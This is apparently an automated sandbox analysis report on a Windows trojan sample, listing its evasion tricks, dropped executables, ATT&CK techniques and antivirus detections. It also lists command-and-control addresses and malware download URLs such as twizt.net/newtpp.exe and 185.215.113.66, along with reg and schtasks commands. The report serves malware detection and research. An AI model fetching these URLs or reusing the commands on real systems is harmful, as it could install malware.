Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\240016073.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Users\user\AppData\Local\Temp\2693731851.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040CCF03_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040CCF04_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040CCF07_2_0040CCF0
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-4357
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-4355
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-4355
Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-4357
Source: C:\Users\user\AppData\Local\Temp\240016073.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeMemory allocated: 1C0F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeEvaded block: after key decisiongraph_3-4416
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeEvaded block: after key decisiongraph_3-4357
Source: C:\Windows\sysnldcvmr.exeEvaded block: after key decisiongraph_7-4355
Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_4-5747
Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-4374
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_3-4371
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_3-5280
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeAPI coverage: 3.9 %
Source: C:\Windows\sysnldcvmr.exeAPI coverage: 1.0 %
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040CCF03_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040CCF07_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exe TID: 7688Thread sleep time: -40000s >= -30000sJump to behavior
Source: C:\Windows\sysnldcvmr.exe TID: 7688Thread sleep count: 161 > 30Jump to behavior
Source: C:\Windows\sysnldcvmr.exe TID: 4428Thread sleep time: -93990s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exe TID: 7932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004066B0
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406570
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004066B0
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406570
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004066B0
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406570
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 40000Jump to behavior
Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 93990Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI!m
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000703000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeAPI call chain: ExitProcess graph end nodegraph_3-4366
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeAPI call chain: ExitProcess graph end nodegraph_3-4356
Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_4-4391
Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_4-4358
Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_4-4366
Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_7-4390
Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_7-4366
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeCode function: 0_2_009C1B48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_009C1B48
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00409EE0 GetProcessHeaps,3_2_00409EE0
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeCode function: 0_2_009C1B48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_009C1B48
Source: C:\Users\user\AppData\Local\Temp\240016073.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: GetLocaleInfoA,strcmp,3_2_0040E730
Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,4_2_0040E730
Source: C:\Windows\sysnldcvmr.exeCode function: GetLocaleInfoA,strcmp,7_2_0040E730
Source: C:\Users\user\AppData\Local\Temp\240016073.exeQueries volume information: C:\Users\user\AppData\Local\Temp\240016073.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeCode function: 0_2_009C1A78 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_009C1A78
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,3_2_00401470
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,3_2_0040D710
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread,3_2_004013B0
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040D710
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,7_2_00401470
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,7_2_00402020
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,7_2_0040D710
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004013B0 CreateEventA,socket,bind,CreateThread,7_2_004013B0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		11
Input Capture		1
System Time Discovery		Remote Services1
Archive Collected Data		12
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		11
Process Injection		1
Obfuscated Files or Information		LSASS Memory1
System Network Connections Discovery		Remote Desktop Protocol11
Input Capture		2
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
DLL Side-Loading		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares3
Clipboard Data		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Registry Run Keys / Startup Folder		121
Masquerading		NTDS25
System Information Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Modify Registry		LSA Secrets231
Security Software Discovery		SSHKeylogging22
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
Virtualization/Sandbox Evasion		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Process Injection		DCSync31
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Hidden Files and Directories		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564700 Sample: LM94OE0VNK.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 55 twizt.net 2->55 67 Suricata IDS alerts for network traffic 2->67 69 Antivirus detection for URL or domain 2->69 71 Antivirus detection for dropped file 2->71 73 5 other signatures 2->73 11 LM94OE0VNK.exe 16 2->11         started        16 sysnldcvmr.exe 2->16         started        signatures3 process4 dnsIp5 63 twizt.net 185.215.113.66, 49702, 49703, 49706 WHOLESALECONNECTIONSNL Portugal 11->63 51 C:\Users\user\AppData\...\2374323789.exe, PE32 11->51 dropped 53 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 11->53 dropped 97 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->97 18 2374323789.exe 1 1 11->18         started        file6 signatures7 process8 file9 45 C:\Windows\sysnldcvmr.exe, PE32 18->45 dropped 75 Antivirus detection for dropped file 18->75 77 Multi AV Scanner detection for dropped file 18->77 79 Found evasive API chain (may stop execution after checking mutex) 18->79 81 5 other signatures 18->81 22 sysnldcvmr.exe 20 18->22         started        signatures10 process11 dnsIp12 57 80.191.218.209, 40500 TCIIR Iran (ISLAMIC Republic Of) 22->57 59 90.156.160.6, 40500 MASTERHOST-ASMoscowRussiaRU Russian Federation 22->59 61 4 other IPs or domains 22->61 47 C:\Users\user\AppData\...\2693731851.exe, PE32 22->47 dropped 49 C:\Users\user\AppData\Local\...\240016073.exe, PE32+ 22->49 dropped 83 Antivirus detection for dropped file 22->83 85 Multi AV Scanner detection for dropped file 22->85 87 Found evasive API chain (may stop execution after checking mutex) 22->87 89 4 other signatures 22->89 27 240016073.exe 2 22->27         started        30 2693731851.exe 22->30         started        file13 signatures14 process15 signatures16 91 Multi AV Scanner detection for dropped file 27->91 93 Machine Learning detection for dropped file 27->93 32 cmd.exe 1 27->32         started        35 cmd.exe 1 27->35         started        95 Antivirus detection for dropped file 30->95 process17 signatures18 65 Uses schtasks.exe or at.exe to add and modify task schedules 32->65 37 conhost.exe 32->37         started        39 reg.exe 1 32->39         started        41 conhost.exe 35->41         started        43 schtasks.exe 1 35->43         started        process19

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
LM94OE0VNK.exe53%ReversingLabsWin32.Trojan.MintZard
LM94OE0VNK.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\2374323789.exe100%AviraHEUR/AGEN.1315882
C:\Windows\sysnldcvmr.exe100%AviraHEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\2693731851.exe100%AviraHEUR/AGEN.1315882
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe100%AviraHEUR/AGEN.1315882
C:\Users\user\AppData\Local\Temp\2374323789.exe100%Joe Sandbox ML
C:\Windows\sysnldcvmr.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\240016073.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2693731851.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe75%ReversingLabsWin32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\2374323789.exe75%ReversingLabsWin32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\240016073.exe79%ReversingLabsByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\2693731851.exe75%ReversingLabsWin32.Trojan.MintZard
C:\Windows\sysnldcvmr.exe75%ReversingLabsWin32.Trojan.MintZard

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://twizt.net/0%Avira URL Cloudsafe
http://91.202.233.141/gonupll9z100%Avira URL Cloudmalware
http://twizt.net/peinstall.phpP0%Avira URL Cloudsafe
http://185.215.113.66/2C:100%Avira URL Cloudmalware
http://91.202.233.141/gonup100%Avira URL Cloudmalware
http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s100%Avira URL Cloudmalware
http://185.215.113.66/1y100%Avira URL Cloudmalware
http://185.215.113.66/2IIC:100%Avira URL Cloudmalware
http://185.215.113.66/1~100%Avira URL Cloudmalware
http://185.215.113.66/2?100%Avira URL Cloudmalware
http://twizt.net/peinstall.php%temp%%s0%Avira URL Cloudsafe
http://91.202.233.141/gonup8100%Avira URL Cloudmalware
http://twizt.net/peinstall.phpvPO0%Avira URL Cloudsafe
http://twizt.net/newtpp.exeP00%Avira URL Cloudsafe
http://91.202.233.141/gonup1100%Avira URL Cloudmalware
http://twizt.net/newtpp.exe0%Avira URL Cloudsafe
http://twizt.net/peinstall.php0%Avira URL Cloudsafe
http://twizt.net/peinstall.phpystem320%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
twizt.net
185.215.113.66
truetrue
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://185.215.113.66/1ysysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    http://twizt.net/LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://185.215.113.66/1~sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    http://twizt.net/peinstall.phpPLM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://91.202.233.141/gonupll9zsysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    http://schemas.xmlsoap.org/soap/encoding/newtpp[1].exe.0.drfalse
      		high
      http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.drfalse
      • Avira URL Cloud: malware
      		unknown
      http://91.202.233.141/2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.drfalse
        		high
        http://91.202.233.141/gonupsysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688560492.00000000020D3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://schemas.xmlsoap.org/soap/envelope/newtpp[1].exe.0.drfalse
          		high
          http://185.215.113.66/2sysnldcvmr.exe, 00000004.00000002.1688593287.00000000021DB000.00000004.00000010.00020000.00000000.sdmpfalse
            		high
            http://185.215.113.66/2C:sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://185.215.113.66/1sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://185.215.113.66/2IIC:sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://185.215.113.66/2?sysnldcvmr.exe, 00000004.00000002.1688257376.000000000075B000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://twizt.net/peinstall.phppLM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://91.202.233.141/gonup8sysnldcvmr.exe, 00000004.00000002.1690356108.00000000057AD000.00000004.00000010.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://twizt.net/peinstall.php%temp%%sLM94OE0VNK.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://185.215.113.66/2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.drfalse
                  		high
                  http://91.202.233.141/gonup1sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://twizt.net/newtpp.exeP0LM94OE0VNK.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://twizt.net/peinstall.phpystem32LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
